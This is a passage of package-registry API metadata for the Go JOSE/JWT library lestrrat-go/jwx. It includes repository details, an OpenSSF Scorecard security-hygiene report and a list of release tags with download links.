/packages/github.com%2Flestrrat-go%2Fjwx%2Fv3/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv3/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv3/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv3/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv3/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":11387284,"name":"github.com/lestrrat-go/jwx/v2/internal/base64","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2/internal","versions_count":32,"first_release_published_at":"2026-04-30T21:46:07.105Z","latest_release_published_at":"2026-04-30T21:46:07.105Z","latest_release_number":"v2.1.6","last_synced_at":"2026-06-02T10:09:36.278Z","created_at":"2025-02-27T18:52:37.952Z","updated_at":"2026-06-02T10:09:36.278Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/internal/base64","install_command":"go get github.com/lestrrat-go/jwx/v2/internal/base64","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/internal/base64#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1